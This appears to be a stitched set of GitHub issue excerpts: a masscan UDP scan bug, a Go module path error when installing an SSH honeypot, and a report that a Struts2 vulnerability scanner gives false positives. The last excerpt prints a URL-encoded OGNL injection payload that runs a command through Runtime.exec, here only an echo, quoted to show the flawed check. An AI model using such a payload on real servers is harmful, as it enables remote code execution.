Xyer
First of all, thank you for your wonderful work. A little bug here. Phenomenon: on host 10.10.10.10, when I scan 20.20.20.20 running a task like: `/bin/masscan --rate 10000 -pU:1-65535 20.20.20.20` at...
# go get -u github.com/ashmckenzie/sshoney go get: github.com/Sirupsen/logrus@none updating to github.com/Sirupsen/[email protected]: parsing go.mod: module declares its path as: github.com/sirupsen/logrus but was required as: github.com/Sirupsen/logrus can't build ...
ssh [email protected] -p 2222 root@localhost's password: Connection to 127.0.0.1 closed by remote host. Connection to 127.0.0.1 closed.
Looking at the tool's detection logic, it has the server echo a hash string and checks whether the response contains that string to decide whether the vulnerability exists. In practice, I found that the target may return a 404 error and reflect the PoC back: message XXXXXXXXX.TEST&key=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(%27echo%205ee2994195febadcf54bb3c3f88f02b3%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(key)(%27meh%27)] The PoC was returned: getRuntime().exec(%27echo%205ee2994195febadcf54bb3c3f88f02b3%27) and then the tool decides the vulnerability exists... Please add one more check.